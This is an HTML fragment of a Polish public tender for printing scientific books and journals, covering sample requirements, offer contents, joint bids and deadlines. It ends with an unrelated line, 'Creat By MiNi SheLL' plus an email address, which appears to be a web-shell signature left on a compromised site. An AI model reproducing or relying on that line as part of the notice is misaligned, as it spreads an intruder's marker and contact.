ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Do oferty należy załączyć:<br/>1. W celu potwierdzenia zgodności z kryterium oceny ofert Zamawiający żąda złożenia wraz z ofertą PRÓBEK oferowanego przedmiotu zamówienia:<br/><br/>W części nr 1:<br/>1.1. W części nr 1 Zamawiający żąda dostarczenia wraz z ofertą PRÓBEK oferowanego przedmiotu zamówienia – dwóch [ 2 ] książek o tematyce naukowej (z wyłączeniem albumów), o parametrach podanych w punkcie 8.1.1. SWZ<br/>1.2.	Jakość dołączonych do oferty próbek dwóch [ 2 ] książek zostanie oceniona punktowo w kryterium oceny ofert „Ocena jakości technicznej książek” (zgodnie z pkt. 19.6. SWZ).<br/><br/>W części nr 2:<br/>1.3. W części nr 2 Na potwierdzenie jakości świadczonych usług poligraficznych Zamawiający żąda dostarczenia wraz z ofertą PRÓBEK oferowanego przedmiotu zamówienia - dwóch [ 2 ] publikacji (jedno [ 1 ] czasopismo i jedna [ 1 ] publikacja o dowolnym charakterze) o parametrach określonych w punkcie 8.1.3. SWZ<br/>1.4. Jakość dołączonych do oferty próbek dwóch [ 2 ] publikacji zostanie oceniona punktowo <br/>w kryterium oceny ofert „Ocena jakości technicznej publikacji” (zgodnie z pkt. 19.15. SWZ).<br/>1.5.	UWAGA:<br/>Niedostarczenie wraz z ofertą próbek wskazanych w pkt. 8.1.1. lub 8.1.3. SWZ lub dostarczenie próbek niezgodnych z pkt. 8.1.1. lub 8.1.3. SWZ skutkować będzie odrzuceniem oferty Wykonawcy na podstawie art. 226 ust. 1 pkt. 5 ustawy, tj. treść oferty jest niezgodna z warunkami zamówienia.<br/>2. Jeżeli Wykonawca nie złoży przedmiotowych środków dowodowych służących potwierdzeniu kryterium oceny ofert wskazanych w pkt 8.1. SWZ lub złożone przedmiotowe środki dowodowe wskazane w pkt 8.1. SWZ będą niekompletne, Zamawiający nie będzie wzywał Wykonawcy do ich złożenia lub uzupełnienia.<br/>3. Wykonawca wraz z ofertą zobowiązany jest dostarczyć Zamawiającemu przedmiotowy środek dowodowy sporządzony na podstawie Opisu przedmiotu zamówienia – Specyfikację cenową odpowiednio na podstawie załącznika nr 1A-1B do SWZ. <br/><br/>dotyczy części nr 1: CENA złotych brutto za wykonanie całości przedmiotu zamówienia wskazana <br/>w Formularzu ofertowym (załącznik nr 1 do SWZ odpowiednio do części nr 1) musi być zgodna z sumą wartości brutto wskazanych w Tabelach nr 1-14 Opisu przedmiotu zamówienia/Specyfikacji cenowej (załącznik nr 1A-1)<br/><br/>dotyczy części nr 2: CENA złotych brutto za wykonanie całości przedmiotu zamówienia wskazana <br/>w Formularzu ofertowym (załącznik nr 1 do SWZ odpowiednio do części nr 2) musi być zgodna z łączna wartością brutto wskazaną w pozycji 4 tabeli w Opisie przedmiotu zamówienia/Specyfikacji cenowej (załącznik nr 1B)<br/><br/>4. Jeżeli Wykonawca nie złoży przedmiotowego środka dowodowego (specyfikacja cenowa) lub złożony przedmiotowy środek dowodowy (specyfikacja cenowa) będzie niekompletny, Zamawiający przewiduje wezwanie Wykonawcy do ich złożenia lub uzupełnienia lub wyjaśnienia. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Opis przedmiotu zamówienia – Specyfikacja cenowa odpowiednio na podstawie załącznika nr 1A-1B do SWZ <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> ZAWARTOŚĆ OFERTY:<br/>1. Formularz ofertowy (załącznik nr 1 do SWZ).<br/>2. Oświadczenie, o którym mowa w pkt. 6.1 SWZ - w art. 125 ust. 1 ustawy (załącznik nr 2A-2B<br/>do SWZ – odpowiednio do części).<br/>3. Przedmiotowe środki dowodowe, zgodnie z pkt. 8 SWZ.<br/>4. Pełnomocnictwo* dla osoby/osób podpisującej ofertę i oświadczenia - dotyczy sytuacji, gdy<br/>ofertę podpisuje osoba, której prawo do reprezentowania Wykonawcy nie wynika z dokumentów<br/>załączonych do oferty.<br/>Wykonawcy korzystający z zasobów podmiotów udostępniających dostarczają dodatkowo -<br/>jeżeli dotyczy:<br/>5. Oświadczenie, o którym mowa w pkt. 6.2 SWZ - w art. 125 ust. 1 ustawy (załącznik nr 2A-2B<br/>do SWZ – odpowiednio do części).<br/>6. Zobowiązanie podmiotu udostępniającego zasoby – (załącznik nr 4A-4B do SWZ –<br/>odpowiednio do części).<br/>Ponadto w sytuacji, w której Wykonawcą są podmioty wspólnie ubiegające się o udzielenie<br/>zamówienia dostarczają - jeżeli dotyczy:<br/>7. Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia z art. 117<br/>ust. 4 ustawy - dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia – (załącznik nr 5A-5B do SWZ – odpowiednio do części).<br/>8. Oświadczenie, o którym mowa w pkt. 6.3 SWZ - w art. 125 ust. 1 ustawy (załącznik nr 2A-2B<br/>do SWZ), składane przez każdego z Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia.<br/>9. Pełnomocnictwo* dla pełnomocnika do reprezentowania w postępowaniu Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia.<br/>* Pełnomocnictwo należy złożyć w formie oryginału lub notarialnie poświadczonej kopii. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Zgodnie z art. 117 ust. 1 ustawy, Zamawiający określa sposób spełniania przez Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia warunków, tj. warunek udziału w<br/>postępowaniu określony w pkt. 5.2.4 SWZ (odpowiednio do części), zostanie ustany za spełniony jeżeli co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia spełni w całości warunek udziału w postępowaniu określony w pkt. 5.2.4 SWZ (odpowiednio do części). Wykonawcy do oferty dołączają oświadczenie - załącznik nr 5A-5B do SWZ, odpowiednio do części -, z którego<br/>wynika, który z Wykonawców spełnia określony w pkt 5.2.4 SWZ warunek (odpowiednio do części)<br/>2. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o<br/>którym mowa w pkt. 6 SWZ – w art. 125 ust. 1 ustawy, składane zgodnie z załącznikiem nr 2A-<br/>2B SWZ (odpowiednio do części), składa każdy z Wykonawców. Oświadczenia te potwierdzają<br/>brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w<br/>jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia został określony w Załącznikach nr 3a (dot. cz. nr 1) oraz 3b (dot. cz. nr 2) <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-02-07 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/transakcja/563509</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-02-07 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-03-08</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> I.<br/>Zasady korzystania z zasobów innych podmiotów<br/>Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościach podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych.<br/>1. Wykonawca, który polega na zdolnościach podmiotów udostępniających zasoby, składa wraz z ofertą zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia (sporządzone zgodnie z załącznikiem nr 4A-4B do SWZ – odpowiednio do części) lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie będzie dysponował niezbędnymi zasobami tych podmiotów.<br/>2. Zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w pkt. 1, potwierdza, że stosunek łączący Wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w szczególności:<br/>2.1. Zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>2.2. Sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia;<br/>3. Zamawiający ocenia, czy udostępniane Wykonawcy przez inne podmioty zdolności, pozwalają na wykazanie przez Wykonawcę spełniania warunków udziału w postępowaniu, o których mowa w art. 112 ust. 2 pkt 3-4 ustawy, a także bada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, które zostały przewidziane względem Wykonawcy.<br/>4. Jeżeli zdolności podmiotu udostępniającego zasoby nie potwierdzają spełnienia przez<br/>Wykonawcę warunków udziału w postępowaniu lub zachodzą wobec tego podmiotów podstawy<br/>wykluczenia, Zamawiający żąda, aby Wykonawca w terminie określonym przez Zamawiającego:<br/>4.1. Zastąpił ten podmiot innym podmiotem lub podmiotami albo<br/>4.2. Wykazał, że samodzielnie spełnia warunki udziału w postępowaniu.<br/>5. Wykonawca nie może, po upływie terminu składania ofert, powoływać się na zdolności podmiotów udostępniających zasoby, jeżeli na etapie składania ofert nie polegał on w danym zakresie na zdolnościach podmiotów udostępniających zasoby.<br/><br/>II<br/>W części nr 1 Kryterium oceny ofert &#34;Termin dostarczenia przedmiotu zamówienia&#34; dzieli się na<br/>dwa podkryteria:<br/>1. Termin dostarczenia książek w miękkiej oprawie – waga dziesięć [ 10 ] punktów<br/>2. Termin dostarczenia książek w twardej oprawie – waga dziesięć [ 10 ] punktów

Creat By MiNi SheLL
Email: jattceo@gmail.com